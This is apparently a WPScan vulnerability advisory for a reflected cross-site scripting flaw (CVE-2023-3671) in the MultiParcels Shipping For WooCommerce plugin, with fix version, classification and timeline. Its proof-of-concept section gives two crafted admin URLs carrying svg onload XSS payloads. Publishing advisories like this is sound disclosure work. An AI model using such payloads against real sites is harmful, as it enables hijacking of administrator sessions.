WordPress Plugin Vulnerabilities

MultiParcels Shipping For WooCommerce < 1.15.4 - Reflected XSS

Description

The plugin does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Note: The issue was fixed in 1.14.15 but re-introduced in 1.14.16

Proof of Concept

Make a logged in admin open one of the URL below:

http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&data[name]='><svg/onload=alert(/XSS/)>
http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&errors[name][][text]=<svg/onload=alert(/XSS/)>

Affects Plugins

Plugin icon
multiparcels-shipping-for-woocommerce
Fixed in 1.15.4

References

CVE
CVE-2023-3671

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
8b765f39-38e0-49c7-843a-a5b9375a32e7

Timeline

Publicly Published
2023-07-17 (about 4 months ago)
Added
2023-07-17 (about 4 months ago)
Last Updated
2023-07-27 (about 4 months ago)

Other

Published
Title
Published
2023-04-25
Title
Shield Security < 17.0.18 - Unauthenticated Stored XSS
Published
2023-09-13
Title
Feeds for YouTube < 2.1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2016-05-28
Title
Gallery - Video Gallery <= 1.7.01 - Stored Cross-Site Scripting (XSS)
Published
2023-08-23
Title
Block Referer Spam < 1.1.9.5 - Admin+ Stored XSS
Published
2023-03-30
Title
affiliate-toolkit – WordPress Affiliate < 3.3.4 - Editor+ Stored XSS